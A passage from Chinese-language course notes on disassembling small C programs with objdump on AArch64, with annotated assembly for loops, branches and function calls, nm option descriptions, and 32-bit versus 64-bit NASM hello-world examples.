 688:  d503201f   nop
30
 68c:  d503201f   nop
31

32
0000000000000690 <deregister_tm_clones>:
33
 690:  b0000080   adrp  x0, 11000 <__data_start>
34
 694:  91004000   add  x0, x0, #0x10
35
 698:  b0000081   adrp  x1, 11000 <__data_start>
36
 69c:  91004021   add  x1, x1, #0x10
37
 6a0:  eb00003f   cmp  x1, x0
38
 6a4:  540000c0   b.eq  6bc <deregister_tm_clones+0x2c>  // b.none
39
 6a8:  90000081   adrp  x1, 10000 <__FRAME_END__+0xf780>
40
 6ac:  f947ec21   ldr  x1, [x1, #4056]
41
 6b0:  b4000061   cbz  x1, 6bc <deregister_tm_clones+0x2c>
42
 6b4:  aa0103f0   mov  x16, x1
43
 6b8:  d61f0200   br  x16
44
 6bc:  d65f03c0   ret
45

46
00000000000006c0 <register_tm_clones>:
47
 6c0:  b0000080   adrp  x0, 11000 <__data_start>
48
 6c4:  91004000   add  x0, x0, #0x10
49
 6c8:  b0000081   adrp  x1, 11000 <__data_start>
50
 6cc:  91004021   add  x1, x1, #0x10
51
 6d0:  cb000021   sub  x1, x1, x0
52
 6d4:  d37ffc22   lsr  x2, x1, #63
53
 6d8:  8b810c41   add  x1, x2, x1, asr #3
54
 6dc:  9341fc21   asr  x1, x1, #1
55
 6e0:  b40000c1   cbz  x1, 6f8 <register_tm_clones+0x38>
56
 6e4:  90000082   adrp  x2, 10000 <__FRAME_END__+0xf780>
57
 6e8:  f947fc42   ldr  x2, [x2, #4088]
58
 6ec:  b4000062   cbz  x2, 6f8 <register_tm_clones+0x38>
59
 6f0:  aa0203f0   mov  x16, x2
60
 6f4:  d61f0200   br  x16
61
 6f8:  d65f03c0   ret
62
 6fc:  d503201f   nop
63

64
0000000000000700 <__do_global_dtors_aux>:
65
 700:  a9be7bfd   stp  x29, x30, [sp, #-32]!
66
 704:  910003fd   mov  x29, sp
67
 708:  f9000bf3   str  x19, [sp, #16]
68
 70c:  b0000093   adrp  x19, 11000 <__data_start>
69
 710:  39404260   ldrb  w0, [x19, #16]
70
 714:  35000140   cbnz  w0, 73c <__do_global_dtors_aux+0x3c>
71
 718:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
72
 71c:  f947f000   ldr  x0, [x0, #4064]
73
 720:  b4000080   cbz  x0, 730 <__do_global_dtors_aux+0x30>
74
 724:  b0000080   adrp  x0, 11000 <__data_start>
75
 728:  f9400400   ldr  x0, [x0, #8]
76
 72c:  97ffffb5   bl  600 <__cxa_finalize@plt>
77
 730:  97ffffd8   bl  690 <deregister_tm_clones>
78
 734:  52800020   mov  w0, #0x1                     // #1
79
 738:  39004260   strb  w0, [x19, #16]
80
 73c:  f9400bf3   ldr  x19, [sp, #16]
81
 740:  a8c27bfd   ldp  x29, x30, [sp], #32
82
 744:  d65f03c0   ret
83
 748:  d503201f   nop
84
 74c:  d503201f   nop
85

86
0000000000000750 <frame_dummy>:
87
 750:  17ffffdc   b  6c0 <register_tm_clones>
88

89
0000000000000754 <main>:
90
//PLAYGROUND.c
91
#include <stdio.h>
92
int main(){
93
 754:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
94
 758:  910003fd   mov  x29, sp
95
   printf("Wu YiHung\n");
96
 75c:  90000000   adrp  x0, 0 <__abi_tag-0x278>
97
 760:  911e4000   add  x0, x0, #0x790
98
 764:  97ffffb3   bl  630 <puts@plt>
99
   return 0;
100
 768:  52800000   mov  w0, #0x0                     // #0
101
}
102
 76c:  a8c17bfd   ldp  x29, x30, [sp], #16
103
 770:  d65f03c0   ret

反編譯5 ==> objdump -S -j .text -M intel PLAYGROUND --no-show-raw-insn

結果5

1
yih@yih:~/Documents/C$ objdump -S -j .text -M intel PLAYGROUND --no-show-raw-insn
2

3
PLAYGROUND:     file format elf64-littleaarch64
4

5
Disassembly of section .text:
6

7
0000000000000640 <_start>:
8
 640:  objdump: unrecognised disassembler option: intel
9
nop
10
 644:  mov  x29, #0x0                     // #0
11
 648:  mov  x30, #0x0                     // #0
12
 64c:  mov  x5, x0
13
 650:  ldr  x1, [sp]
14
 654:  add  x2, sp, #0x8
15
 658:  mov  x6, sp
16
 65c:  adrp  x0, 10000 <__FRAME_END__+0xf780>
17
 660:  ldr  x0, [x0, #4080]
18
 664:  mov  x3, #0x0                     // #0
19
 668:  mov  x4, #0x0                     // #0
20
 66c:  bl  5f0 <__libc_start_main@plt>
21
 670:  bl  620 <abort@plt>
22

23
0000000000000674 <call_weak_fn>:
24
 674:  adrp  x0, 10000 <__FRAME_END__+0xf780>
25
 678:  ldr  x0, [x0, #4072]
26
 67c:  cbz  x0, 684 <call_weak_fn+0x10>
27
 680:  b  610 <__gmon_start__@plt>
28
 684:  ret
29
 688:  nop
30
 68c:  nop
31

32
0000000000000690 <deregister_tm_clones>:
33
 690:  adrp  x0, 11000 <__data_start>
34
 694:  add  x0, x0, #0x10
35
 698:  adrp  x1, 11000 <__data_start>
36
 69c:  add  x1, x1, #0x10
37
 6a0:  cmp  x1, x0
38
 6a4:  b.eq  6bc <deregister_tm_clones+0x2c>  // b.none
39
 6a8:  adrp  x1, 10000 <__FRAME_END__+0xf780>
40
 6ac:  ldr  x1, [x1, #4056]
41
 6b0:  cbz  x1, 6bc <deregister_tm_clones+0x2c>
42
 6b4:  mov  x16, x1
43
 6b8:  br  x16
44
 6bc:  ret
45

46
00000000000006c0 <register_tm_clones>:
47
 6c0:  adrp  x0, 11000 <__data_start>
48
 6c4:  add  x0, x0, #0x10
49
 6c8:  adrp  x1, 11000 <__data_start>
50
 6cc:  add  x1, x1, #0x10
51
 6d0:  sub  x1, x1, x0
52
 6d4:  lsr  x2, x1, #63
53
 6d8:  add  x1, x2, x1, asr #3
54
 6dc:  asr  x1, x1, #1
55
 6e0:  cbz  x1, 6f8 <register_tm_clones+0x38>
56
 6e4:  adrp  x2, 10000 <__FRAME_END__+0xf780>
57
 6e8:  ldr  x2, [x2, #4088]
58
 6ec:  cbz  x2, 6f8 <register_tm_clones+0x38>
59
 6f0:  mov  x16, x2
60
 6f4:  br  x16
61
 6f8:  ret
62
 6fc:  nop
63

64
0000000000000700 <__do_global_dtors_aux>:
65
 700:  stp  x29, x30, [sp, #-32]!
66
 704:  mov  x29, sp
67
 708:  str  x19, [sp, #16]
68
 70c:  adrp  x19, 11000 <__data_start>
69
 710:  ldrb  w0, [x19, #16]
70
 714:  cbnz  w0, 73c <__do_global_dtors_aux+0x3c>
71
 718:  adrp  x0, 10000 <__FRAME_END__+0xf780>
72
 71c:  ldr  x0, [x0, #4064]
73
 720:  cbz  x0, 730 <__do_global_dtors_aux+0x30>
74
 724:  adrp  x0, 11000 <__data_start>
75
 728:  ldr  x0, [x0, #8]
76
 72c:  bl  600 <__cxa_finalize@plt>
77
 730:  bl  690 <deregister_tm_clones>
78
 734:  mov  w0, #0x1                     // #1
79
 738:  strb  w0, [x19, #16]
80
 73c:  ldr  x19, [sp, #16]
81
 740:  ldp  x29, x30, [sp], #32
82
 744:  ret
83
 748:  nop
84
 74c:  nop
85

86
0000000000000750 <frame_dummy>:
87
 750:  b  6c0 <register_tm_clones>
88

89
0000000000000754 <main>:
90
//PLAYGROUND.c
91
#include <stdio.h>
92
int main(){
93
 754:  stp  x29, x30, [sp, #-16]!
94
 758:  mov  x29, sp
95
   printf("Wu YiHung\n");
96
 75c:  adrp  x0, 0 <__abi_tag-0x278>
97
 760:  add  x0, x0, #0x790
98
 764:  bl  630 <puts@plt>
99
   return 0;
100
 768:  mov  w0, #0x0                     // #0
101
}
102
 76c:  ldp  x29, x30, [sp], #16
103
 770:  ret

不顯示機器指令 ==> —no-show-raw-insn

範例2

原始碼 PLAYGROUND.c

1
#include <stdio.h>
2
int f(int x, int y){
3
  int sum = 0;
4
  sum += x;
5
  sum += y;
6
  return sum;
7
}
8
int main(){
9
  int a = 128, b = 64;
10
  printf("%d\n",f(a, b));
11
  return 0;
12
}

編譯 gcc -o PLAYGROUND PLAYGROUND.c -g
反編譯(使用intel格式) ==> objdump -D -M intel PLAYGROUND
- 結果↗
反編譯(使用intel格式+ 只要執行區段.text) ==> objdump -D -M intel -j .text PLAYGROUND
- 結果↗
反編譯 ==> objdump -D -M intel -j .text PLAYGROUND --no-show-raw-insn
- 結果↗

反編譯 ==> objdump -S -M intel -j .text PLAYGROUND --no-show-raw-insn

結果↗

1
PLAYGROUND:     file format elf64-littleaarch64
2

3
Disassembly of section .text:
4

5
0000000000000640 <_start>:
6
 640:  objdump: unrecognised disassembler option: intel
7
nop
8
 644:  mov  x29, #0x0                     // #0
9
 648:  mov  x30, #0x0                     // #0
10
 64c:  mov  x5, x0
11
 650:  ldr  x1, [sp]
12
 654:  add  x2, sp, #0x8
13
 658:  mov  x6, sp
14
 65c:  adrp  x0, 10000 <__FRAME_END__+0xf708>
15
 660:  ldr  x0, [x0, #4080]
16
 664:  mov  x3, #0x0                     // #0
17
 668:  mov  x4, #0x0                     // #0
18
 66c:  bl  5f0 <__libc_start_main@plt>
19
 670:  bl  620 <abort@plt>
20

21
0000000000000674 <call_weak_fn>:
22
 674:  adrp  x0, 10000 <__FRAME_END__+0xf708>
23
 678:  ldr  x0, [x0, #4072]
24
 67c:  cbz  x0, 684 <call_weak_fn+0x10>
25
 680:  b  610 <__gmon_start__@plt>
26
 684:  ret
27
 688:  nop
28
 68c:  nop
29

30
0000000000000690 <deregister_tm_clones>:
31
 690:  adrp  x0, 11000 <__data_start>
32
 694:  add  x0, x0, #0x10
33
 698:  adrp  x1, 11000 <__data_start>
34
 69c:  add  x1, x1, #0x10
35
 6a0:  cmp  x1, x0
36
 6a4:  b.eq  6bc <deregister_tm_clones+0x2c>  // b.none
37
 6a8:  adrp  x1, 10000 <__FRAME_END__+0xf708>
38
 6ac:  ldr  x1, [x1, #4056]
39
 6b0:  cbz  x1, 6bc <deregister_tm_clones+0x2c>
40
 6b4:  mov  x16, x1
41
 6b8:  br  x16
42
 6bc:  ret
43

44
00000000000006c0 <register_tm_clones>:
45
 6c0:  adrp  x0, 11000 <__data_start>
46
 6c4:  add  x0, x0, #0x10
47
 6c8:  adrp  x1, 11000 <__data_start>
48
 6cc:  add  x1, x1, #0x10
49
 6d0:  sub  x1, x1, x0
50
 6d4:  lsr  x2, x1, #63
51
 6d8:  add  x1, x2, x1, asr #3
52
 6dc:  asr  x1, x1, #1
53
 6e0:  cbz  x1, 6f8 <register_tm_clones+0x38>
54
 6e4:  adrp  x2, 10000 <__FRAME_END__+0xf708>
55
 6e8:  ldr  x2, [x2, #4088]
56
 6ec:  cbz  x2, 6f8 <register_tm_clones+0x38>
57
 6f0:  mov  x16, x2
58
 6f4:  br  x16
59
 6f8:  ret
60
 6fc:  nop
61

62
0000000000000700 <__do_global_dtors_aux>:
63
 700:  stp  x29, x30, [sp, #-32]!
64
 704:  mov  x29, sp
65
 708:  str  x19, [sp, #16]
66
 70c:  adrp  x19, 11000 <__data_start>
67
 710:  ldrb  w0, [x19, #16]
68
 714:  cbnz  w0, 73c <__do_global_dtors_aux+0x3c>
69
 718:  adrp  x0, 10000 <__FRAME_END__+0xf708>
70
 71c:  ldr  x0, [x0, #4064]
71
 720:  cbz  x0, 730 <__do_global_dtors_aux+0x30>
72
 724:  adrp  x0, 11000 <__data_start>
73
 728:  ldr  x0, [x0, #8]
74
 72c:  bl  600 <__cxa_finalize@plt>
75
 730:  bl  690 <deregister_tm_clones>
76
 734:  mov  w0, #0x1                     // #1
77
 738:  strb  w0, [x19, #16]
78
 73c:  ldr  x19, [sp, #16]
79
 740:  ldp  x29, x30, [sp], #32
80
 744:  ret
81
 748:  nop
82
 74c:  nop
83

84
0000000000000750 <frame_dummy>:
85
 750:  b  6c0 <register_tm_clones>
86

87
0000000000000754 <f>:
88
//PLAYGROUND.c
89
#include <stdio.h>
90
int f(int x, int y){
91
 754:  sub  sp, sp, #0x20
92
 758:  str  w0, [sp, #12]
93
 75c:  str  w1, [sp, #8]
94
  int sum = 0;
95
 760:  str  wzr, [sp, #28]
96
  sum += x;
97
 764:  ldr  w1, [sp, #28]
98
 768:  ldr  w0, [sp, #12]
99
 76c:  add  w0, w1, w0
100
 770:  str  w0, [sp, #28]
101
  sum += y;
102
 774:  ldr  w1, [sp, #28]
103
 778:  ldr  w0, [sp, #8]
104
 77c:  add  w0, w1, w0
105
 780:  str  w0, [sp, #28]
106
  return sum;
107
 784:  ldr  w0, [sp, #28]
108
}
109
 788:  add  sp, sp, #0x20
110
 78c:  ret
111

112
0000000000000790 <main>:
113
int main(){
114
 790:  stp  x29, x30, [sp, #-32]!
115
 794:  mov  x29, sp
116
  int a = 128, b = 64;
117
 798:  mov  w0, #0x80                    // #128
118
 79c:  str  w0, [sp, #24]
119
 7a0:  mov  w0, #0x40                    // #64
120
 7a4:  str  w0, [sp, #28]
121
  printf("%d\n",f(a, b));
122
 7a8:  ldr  w1, [sp, #28]
123
 7ac:  ldr  w0, [sp, #24]
124
 7b0:  bl  754 <f>
125
 7b4:  mov  w1, w0
126
 7b8:  adrp  x0, 0 <__abi_tag-0x278>
127
 7bc:  add  x0, x0, #0x7f0
128
 7c0:  bl  630 <printf@plt>
129
  return 0;
130
 7c4:  mov  w0, #0x0                     // #0
131
}
132
 7c8:  ldp  x29, x30, [sp], #32
133
 7cc:  ret

Linux 執行檔分析常用工具

ldd 指令

用途 - 列出動態相依關係。
語法 ldd FileName
示範

nm 指令

列出目標檔案(.o)的符號清單

查到的解釋意義==>出處↗

1
-a或–debug-syms：顯示所有的符號，包括debugger-only symbols。
2
-B：等同–formatxtbsd，用來相容MIPS的nm。
3
-C或–demangle：將低階符號名稱解析(demangle)成使用者級名字。 這樣可以使得C++函數名具有可讀性。
4
–no-demangle：預設的選項，不需要將低階符號名稱解析成使用者級名。
5
-D或–dynamic：顯示動態符號。 該任選項僅對於動態目標(例如特定類型的共享庫)有意義。
6
-f format：使用format格式輸出。 format可以選取bsd、sysv或posix，該選項在GNU的nm中有用。 預設為bsd。
7
-g或–extern-only：僅顯示外部符號。
8
-n、-v或–numeric-sort：依符號對應位址的順序排序，而非按符號名稱的字元順序。
9
-p或–no-sort：依目標檔案中遇到的符號順序顯示，不排序。
10
-P或–portability：使用POSIX.2標準輸出格式取代預設的輸出格式。 等同於使用任選項-f posix。
11
-s或–print-armap：當列出庫中成員的符號時，包含索引。 索引的內容包含：哪些模組包含哪些名字的對應。
12
-r或–reverse-sort：反轉排序的順序(例如，升序變成降序)。
13
–size-sort：依大小排列符號順序。 該大小是按照一個符號的值與它下一個符號的值進行計算的。
14
–targetxtbfdname：指定一個目標代碼的格式，而非使用系統的預設格式。
15
-u或–undefined-only：僅顯示沒有定義的符號(那些外部符號)。
16
–defined-only:僅顯示定義的符號。
17
-l或–line-numbers：對每個符號，使用偵錯資訊來試圖找到檔案名稱和行號。
18
-V或–version：顯示nm的版本號碼。
19
–help：顯示nm的選項。

計算機結構與組合程式

1.機器碼(machine code| instruction set)與組合程式(assembly program)
2.計算機結構主題
3.組合語言與程式

線上反組譯服務 ==> 連結↗

測試範例: 55 8b ec 機器碼的組合語言為何?
結果

NASM(Netwide Assembler)組合程式設計

NASM(Netwide Assembler)

官方文件 https://www.nasm.us/xdoc/2.15/html/↗ ↗NASM開發環境1:線上開發環境

myCompiler(64位元) https://www.mycompiler.io/new/asm-x86_64↗

nasm程式範例

範例:費式序列:列印出90個費式序列
- 資料來源:[https://cs.lmu.edu/~ray/notes/nasmtutorial/↗]
- nasm -f elf64 PLAYGROUND.asm
- gcc -o PLAYGROUND PLAYGROUND.o -no-pie
- ./PLAYGROUND

32位元NASM與64位元NASM比較

原程式

1
#include <stdio.h>
2
int main(){
3
  printf("Yi-Hung Wu");
4
  return 0;
5
}

32位元NASM

1
section .data
2
    msg db "Yi-Hung Wu", 0
3

4
section .text
5
    global _start
6

7
_start:
8
    ; Call C library function to print the string
9
    push msg
10
    call printf
11

12
    ; Exit the program
13
    mov eax, 0       ; Return 0 status
14
    mov ebx, 0x1     ; Exit syscall number
15
    int 0x80         ; Call kernel

64位元NASM

1
section .data
2
    message db "Yi-Hung Wu", 10
3
    len equ $ - message
4

5
section .text
6
    global _start
7

8
_start:
9
    mov     rax, 1
10
    mov     rdi, 1
11
    mov     rsi, message
12
    mov     rdx, len
13
    syscall
14

15
    mov     rax, 60
16
    xor     rdi, rdi
17
    syscall

相互比較與說明

圈出不同之處

教材導讀

GITHUB ==> https://github.com/Apress/beginning-x64-assembly-programming/tree/master↗
git clone https://github.com/Apress/beginning-x64-assembly-programming.git↗
結果

Chapter 01

組譯後並運行執行檔

C vs Assembly

C 程式編譯成執行檔 == >
- gcc PLAYGROUND.c -o PLAYGROUND -g
將執行檔逆向成組合語言 == >
- objdump -S -j .text -M intel PLAYGROUND --no-show-raw-insn

範例一（計算與先後）

1
#include <stdio.h>
2
int main(){
3
  int x = 11203, y = 21004;
4
  printf("%d", (x++) + (++y));
5
  return 0;
6
}

編譯與執行結果
assembly

1
0000000000000754 <main>:
2
#include <stdio.h>
3
int main(){
4
 754:  stp  x29, x30, [sp, #-32]!
5
 758:  mov  x29, sp
6

7
  int x = 11203, y = 21004;
8
 75c:  mov  w0, #0x2bc3            // 把11203 放到 w0
9
 760:  str  w0, [sp, #24]          // 在[sp+24]儲存 w0 (11203)
10
 764:  mov  w0, #0x520c            // 把21004 放到 w0
11
 768:  str  w0, [sp, #28]          // 在[sp+28]儲存w0 (21004)
12

13
  printf("%d", (x++) + (++y));
14
 76c:  ldr  w0, [sp, #24]          // 從[sp+24]輸入x的值到 w0
15
 770:  add  w1, w0, #0x1           // 將x增加1，結果儲存到w1
16
 774:  str  w1, [sp, #24]          // 在[sp+24]儲存x的更新值
17
 778:  ldr  w1, [sp, #28]          // 從[sp+28]輸入y的值到w1
18
 77c:  add  w1, w1, #0x1           // 將y增加1，結果儲存到w1
19
 780:  str  w1, [sp, #28]          // 在[sp+28]儲存y的更新值
20
 784:  ldr  w1, [sp, #28]          //輸入更新後的y到w1
21
 788:  add  w0, w0, w1            // 將更新後的x和y相加，結果儲存到w0
22
 78c:  mov  w1, w0                // 將結果複製到w1
23
 790:  adrp  x0, 0 <__abi_tag-0x278>
24
 794:  add  x0, x0, #0x7c8
25
 798:  bl  630 <printf@plt>
26

27
  // 返回 0 ，就是停止
28
  return 0;
29
 79c:  mov  w0, #0x0                // 將 0輸入寄存器 w0
30
}
31
 7a0:  ldp  x29, x30, [sp], #32
32
 7a4:  ret

範例二（if-else）

1
#include<stdio.h>
2
int main(){
3
   int num;
4
   printf("Please enter a positive integer:");
5
   scanf("%d",&num);
6
   if (num%2==0){
7
     printf("The number you entered is an even number.");
8
   }
9
   else{
10
     printf("The number you entered is an odd number.");
11
   }
12
}

編譯與執行結果
assembly

1
0000000000000894 <main>:
2
#include<stdio.h>
3
int main(){
4
 894:  stp  x29, x30, [sp, #-32]!
5
 898:  mov  x29, sp
6
 89c:  adrp  x0, 10000 <__FRAME_END__+0xf540>
7
 8a0:  ldr  x0, [x0, #4072]
8
 8a4:  ldr  x1, [x0]
9
 8a8:  str  x1, [sp, #24]
10
 8ac:  mov  x1, #0x0                     // #0
11
   int num;
12
   printf("Please enter a positive integer:");
13
 8b0:  adrp  x0, 0 <__abi_tag-0x278>
14
 8b4:  add  x0, x0, #0x950
15
 8b8:  bl  750 <printf@plt>
16
   scanf("%d",&num);
17
 8bc:  add  x0, sp, #0x14
18
 8c0:  mov  x1, x0
19
 8c4:  adrp  x0, 0 <__abi_tag-0x278>
20
 8c8:  add  x0, x0, #0x978
21
 8cc:  bl  740 <__isoc99_scanf@plt>
22
   if (num%2==0){
23
 8d0:  ldr  w0, [sp, #20]
24
 8d4:  and  w0, w0, #0x1
25
 8d8:  cmp  w0, #0x0
26
 8dc:  b.ne  8f0 <main+0x5c>  // b.any
27
     printf("The number you entered is an even number.");
28
 8e0:  adrp  x0, 0 <__abi_tag-0x278>
29
 8e4:  add  x0, x0, #0x980
30
 8e8:  bl  750 <printf@plt>
31
 8ec:  b  8fc <main+0x68>
32
   }
33
   else{
34
     printf("The number you entered is an odd number.");
35
 8f0:  adrp  x0, 0 <__abi_tag-0x278>
36
 8f4:  add  x0, x0, #0x9b0
37
 8f8:  bl  750 <printf@plt>
38
 8fc:  mov  w0, #0x0                     // #0
39
 900:  mov  w1, w0
40
   }
41
}
42
 904:  adrp  x0, 10000 <__FRAME_END__+0xf540>
43
 908:  ldr  x0, [x0, #4072]
44
 90c:  ldr  x3, [sp, #24]
45
 910:  ldr  x2, [x0]
46
 914:  subs  x3, x3, x2
47
 918:  mov  x2, #0x0                     // #0
48
 91c:  b.eq  924 <main+0x90>  // b.none
49
 920:  bl  710 <__stack_chk_fail@plt>
50
 924:  mov  w0, w1
51
 928:  ldp  x29, x30, [sp], #32
52
 92c:  ret

範例三（LOOP）

1
//FOR LOOP
2
#include <stdio.h>
3
int main(){
4
   int n, i, sum = 1; //由於是階乘，故sum = 1 必為預設
5
   printf("Enter a positive integer: ");
6
   scanf("%d", &n);
7
   for (i = 1; i <= n; ++i){
8
       sum *= i;
9
   }
10
   printf("Sum = %d", sum);
11
   return 0;
12
}

編譯與執行結果
assembly

1
0000000000000894 <main>:
2
//FOR LOOP
3
#include <stdio.h>
4
int main(){
5
 894:  stp  x29, x30, [sp, #-48]!
6
 898:  mov  x29, sp
7
 89c:  adrp  x0, 10000 <__FRAME_END__+0xf578>
8
 8a0:  ldr  x0, [x0, #4072]
9
 8a4:  ldr  x1, [x0]
10
 8a8:  str  x1, [sp, #40]
11
 8ac:  mov  x1, #0x0                     // #0
12
   int n, i, sum = 1; //由於是階乘，故sum = 1 必為預設
13
 8b0:  mov  w0, #0x1                     // #1
14
 8b4:  str  w0, [sp, #36]
15
   printf("Enter a positive integer: ");
16
 8b8:  adrp  x0, 0 <__abi_tag-0x278>
17
 8bc:  add  x0, x0, #0x970
18
 8c0:  bl  750 <printf@plt>
19
   scanf("%d", &n);
20
 8c4:  add  x0, sp, #0x1c
21
 8c8:  mov  x1, x0
22
 8cc:  adrp  x0, 0 <__abi_tag-0x278>
23
 8d0:  add  x0, x0, #0x990
24
 8d4:  bl  740 <__isoc99_scanf@plt>
25
   for (i = 1; i <= n; ++i){
26
 8d8:  mov  w0, #0x1                     // #1
27
 8dc:  str  w0, [sp, #32]
28
 8e0:  b  900 <main+0x6c>
29
       sum *= i;
30
 8e4:  ldr  w1, [sp, #36]
31
 8e8:  ldr  w0, [sp, #32]
32
 8ec:  mul  w0, w1, w0
33
 8f0:  str  w0, [sp, #36]
34
   for (i = 1; i <= n; ++i){
35
 8f4:  ldr  w0, [sp, #32]
36
 8f8:  add  w0, w0, #0x1
37
 8fc:  str  w0, [sp, #32]
38
 900:  ldr  w0, [sp, #28]
39
 904:  ldr  w1, [sp, #32]
40
 908:  cmp  w1, w0
41
 90c:  b.le  8e4 <main+0x50>
42
   }
43
   printf("Sum = %d", sum);
44
 910:  ldr  w1, [sp, #36]
45
 914:  adrp  x0, 0 <__abi_tag-0x278>
46
 918:  add  x0, x0, #0x998
47
 91c:  bl  750 <printf@plt>
48
   return 0;
49
 920:  mov  w0, #0x0                     // #0
50
}
51
 924:  mov  w1, w0
52
 928:  adrp  x0, 10000 <__FRAME_END__+0xf578>
53
 92c:  ldr  x0, [x0, #4072]
54
 930:  ldr  x3, [sp, #40]
55
 934:  ldr  x2, [x0]
56
 938:  subs  x3, x3, x2
57
 93c:  mov  x2, #0x0                     // #0
58
 940:  b.eq  948 <main+0xb4>  // b.none
59
 944:  bl  710 <__stack_chk_fail@plt>
60
 948:  mov  w0, w1
61
 94c:  ldp  x29, x30, [sp], #48
62
 950:  ret

1
//WHILE LOOP
2
#include <stdio.h>
3
int main(){
4
   int n, i, sum = 1;
5
   printf("Enter a positive integer: ");
6
   scanf("%d", &n);
7
   i = 1;
8
   while (i <= n){
9
       sum *= i;
10
       ++i;
11
   }
12
   printf("Sum = %d", sum);
13
   return 0;
14
}

編譯與執行結果
- assembly

1
0000000000000894 <main>:
2
//WHILE LOOP
3
#include <stdio.h>
4
int main(){
5
 894:  stp  x29, x30, [sp, #-48]!
6
 898:  mov  x29, sp
7
 89c:  adrp  x0, 10000 <__FRAME_END__+0xf578>
8
 8a0:  ldr  x0, [x0, #4072]
9
 8a4:  ldr  x1, [x0]
10
 8a8:  str  x1, [sp, #40]
11
 8ac:  mov  x1, #0x0                     // #0
12
   int n, i, sum = 1;
13
 8b0:  mov  w0, #0x1                     // #1
14
 8b4:  str  w0, [sp, #36]
15
   printf("Enter a positive integer: ");
16
 8b8:  adrp  x0, 0 <__abi_tag-0x278>
17
 8bc:  add  x0, x0, #0x970
18
 8c0:  bl  750 <printf@plt>
19
   scanf("%d", &n);
20
 8c4:  add  x0, sp, #0x1c
21
 8c8:  mov  x1, x0
22
 8cc:  adrp  x0, 0 <__abi_tag-0x278>
23
 8d0:  add  x0, x0, #0x990
24
 8d4:  bl  740 <__isoc99_scanf@plt>
25
   i = 1;
26
 8d8:  mov  w0, #0x1                     // #1
27
 8dc:  str  w0, [sp, #32]
28
   while (i <= n){
29
 8e0:  b  900 <main+0x6c>
30
       sum *= i;
31
 8e4:  ldr  w1, [sp, #36]
32
 8e8:  ldr  w0, [sp, #32]
33
 8ec:  mul  w0, w1, w0
34
 8f0:  str  w0, [sp, #36]
35
       ++i;
36
 8f4:  ldr  w0, [sp, #32]
37
 8f8:  add  w0, w0, #0x1
38
 8fc:  str  w0, [sp, #32]
39
   while (i <= n){
40
 900:  ldr  w0, [sp, #28]
41
 904:  ldr  w1, [sp, #32]
42
 908:  cmp  w1, w0
43
 90c:  b.le  8e4 <main+0x50>
44
   }
45
   printf("Sum = %d", sum);
46
 910:  ldr  w1, [sp, #36]
47
 914:  adrp  x0, 0 <__abi_tag-0x278>
48
 918:  add  x0, x0, #0x998
49
 91c:  bl  750 <printf@plt>
50
   return 0;
51
 920:  mov  w0, #0x0                     // #0
52
}
53
 924:  mov  w1, w0
54
 928:  adrp  x0, 10000 <__FRAME_END__+0xf578>
55
 92c:  ldr  x0, [x0, #4072]
56
 930:  ldr  x3, [sp, #40]
57
 934:  ldr  x2, [x0]
58
 938:  subs  x3, x3, x2
59
 93c:  mov  x2, #0x0                     // #0
60
 940:  b.eq  948 <main+0xb4>  // b.none
61
 944:  bl  710 <__stack_chk_fail@plt>
62
 948:  mov  w0, w1
63
 94c:  ldp  x29, x30, [sp], #48
64
 950:  ret

1
//DO While LOOP
2
#include <stdio.h>
3
int main() {
4
   int n, i, sum = 1;
5
   printf("Enter a positive integer: ");
6
   scanf("%d", &n);
7
   i = 1;
8
   do{
9
     sum *= i;
10
     ++i;
11
   } while (i <= n);
12
   printf("Sum = %d", sum);
13
   return 0;
14
}

編譯與執行結果
- assembly

1
0000000000000894 <main>:
2
//DO While LOOP
3
#include <stdio.h>
4
int main() {
5
 894:  stp  x29, x30, [sp, #-48]!
6
 898:  mov  x29, sp
7
 89c:  adrp  x0, 10000 <__FRAME_END__+0xf578>
8
 8a0:  ldr  x0, [x0, #4072]
9
 8a4:  ldr  x1, [x0]
10
 8a8:  str  x1, [sp, #40]
11
 8ac:  mov  x1, #0x0                     // #0
12
   int n, i, sum = 1;
13
 8b0:  mov  w0, #0x1                     // #1
14
 8b4:  str  w0, [sp, #36]
15
   printf("Enter a positive integer: ");
16
 8b8:  adrp  x0, 0 <__abi_tag-0x278>
17
 8bc:  add  x0, x0, #0x970
18
 8c0:  bl  750 <printf@plt>
19
   scanf("%d", &n);
20
 8c4:  add  x0, sp, #0x1c
21
 8c8:  mov  x1, x0
22
 8cc:  adrp  x0, 0 <__abi_tag-0x278>
23
 8d0:  add  x0, x0, #0x990
24
 8d4:  bl  740 <__isoc99_scanf@plt>
25
   i = 1;
26
 8d8:  mov  w0, #0x1                     // #1
27
 8dc:  str  w0, [sp, #32]
28
   do{
29
     sum *= i;
30
 8e0:  ldr  w1, [sp, #36]
31
 8e4:  ldr  w0, [sp, #32]
32
 8e8:  mul  w0, w1, w0
33
 8ec:  str  w0, [sp, #36]
34
     ++i;
35
 8f0:  ldr  w0, [sp, #32]
36
 8f4:  add  w0, w0, #0x1
37
 8f8:  str  w0, [sp, #32]
38
   } while (i <= n);
39
 8fc:  ldr  w0, [sp, #28]
40
 900:  ldr  w1, [sp, #32]
41
 904:  cmp  w1, w0
42
 908:  b.le  8e0 <main+0x4c>
43
   printf("Sum = %d", sum);
44
 90c:  ldr  w1, [sp, #36]
45
 910:  adrp  x0, 0 <__abi_tag-0x278>
46
 914:  add  x0, x0, #0x998
47
 918:  bl  750 <printf@plt>
48
   return 0;
49
 91c:  mov  w0, #0x0                     // #0
50
}
51
 920:  mov  w1, w0
52
 924:  adrp  x0, 10000 <__FRAME_END__+0xf578>
53
 928:  ldr  x0, [x0, #4072]
54
 92c:  ldr  x3, [sp, #40]
55
 930:  ldr  x2, [x0]
56
 934:  subs  x3, x3, x2
57
 938:  mov  x2, #0x0                     // #0
58
 93c:  b.eq  944 <main+0xb0>  // b.none
59
 940:  bl  710 <__stack_chk_fail@plt>
60
 944:  mov  w0, w1
61
 948:  ldp  x29, x30, [sp], #48
62
 94c:  ret

範例四 ( 函數 )

1
#include <stdio.h>
2
int f(int z){
3
    int mul = 1, i = 1;
4
    while (i <= z){
5
        mul *= i;
6
        i++;
7
    };
8
    return mul;
9
}
10
int main(){
11
    int i = 9;
12
    printf("%d 的階乘為%d\n", i, f(i));
13
    return 0;
14
}

1
- 編譯與執行結果

assembly

1
00000000000007a8 <main>:
2
int main(){
3
 7a8:  stp  x29, x30, [sp, #-32]!
4
 7ac:  mov  x29, sp
5
    int i = 4;
6
 7b0:  mov  w0, #0x9                     // #9
7
 7b4:  str  w0, [sp, #28]
8
